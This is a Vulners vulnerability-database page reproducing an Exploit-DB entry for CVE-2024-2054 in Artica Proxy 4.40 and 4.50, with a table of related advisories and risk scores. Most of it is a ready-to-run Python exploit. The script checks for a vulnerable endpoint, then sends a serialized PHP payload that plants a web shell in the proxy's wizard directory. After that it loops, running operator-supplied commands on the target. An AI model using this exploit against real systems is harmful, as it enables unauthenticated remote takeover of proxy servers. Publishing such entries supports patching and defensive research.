Vulners
Lucene search
📄 Artica Proxy 4.50 Remote Code Execution
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | Artica Proxy 4.50 Unauthenticated PHP Deserialization Vulnerability | 6 Mar 202400:00 | – | zdt |
| Artica Proxy Unauthenticated PHP Deserialization Exploit | 27 Mar 202400:00 | – | zdt |
 | Exploit for Deserialization of Untrusted Data in Articatech Artica_Proxy | 25 Mar 202407:01 | – | githubexploit |
 | CVE-2024-2054 | 31 Dec 200023:00 | – | circl |
 | Artica Proxy Code Issue Vulnerability | 9 Mar 202400:00 | – | cnnvd |
 | CVE-2024-2054 | 5 Mar 202418:56 | – | cve |
 | CVE-2024-2054 Artica Proxy Unauthenticated PHP Deserialization Vulnerability | 5 Mar 202418:56 | – | cvelist |
 | Artica Proxy 4.50 - Remote Code Execution (RCE) | 9 Apr 202500:00 | – | exploitdb |
 | Artica Proxy Unauthenticated PHP Deserialization Vulnerability | 5 Mar 202400:00 | – | korelogic |
 | Artica Proxy Unauthenticated PHP Deserialization Vulnerability | 26 Mar 202419:51 | – | metasploit |
10
# Exploit Title: CVE-2024-2054 Artica-Proxy administrative web application insecure deserialization (RCE)
# Google Dork:
# Date: 23-04-2024
# Exploit Author: Madan
# Vendor Homepage: https://artica-proxy.com/
# Version: 4.40, 4.50
# Tested on: [relevant os]
# CVE : CVE-2024-2054
you can also find the exploit on my github repo:
https://github.com/Madan301/CVE-2024-2054
import requests
import base64
import urllib3
from colorama import Fore
print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might
sometimes vary from how artica proxy interface is hosted")
URL = input("Enter url: ")
if URL[-1]=="/":
ACTUAL_URL = URL[:-1]
else:
ACTUAL_URL = URL
ARTICA_URL = ACTUAL_URL
def check(ARTICA_URL):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
try:
check = requests.get(ARTICA_URL+'/wizard/wiz.upload.php',verify=False)
except Exception as e:
print(Fore.RED+"Could not reach, check URL")
if check.status_code==200:
print(Fore.GREEN+"Vulnerable")
return True
else:
print(Fore.RED+"Not Vulnerable")
def exploit(ARTICA_URL):
payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
payload_data = {
"TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": {
"cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php",
"cache_serializer": "json",
"cache_size": 999999999,
"cache_data": {
payload: {
"cache_date": 0,
"ttl": 999999999
}
}
}
}
while True:
PAYLOAD_CMD = input("enter command: ")
url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}"
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
response = requests.get(url, verify=False)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
if response.status_code == 200:
cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}"
cmd_response = requests.get(cmd_url, verify=False)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
print(cmd_response.text)
else:
print("Failed to execute the payload")
check = check(ARTICA_URL=ACTUAL_URL)
if check==True:
exploit(ARTICA_URL=ARTICA_URL)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Apr 2025 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 3.19.8
EPSS0.87774
SSVC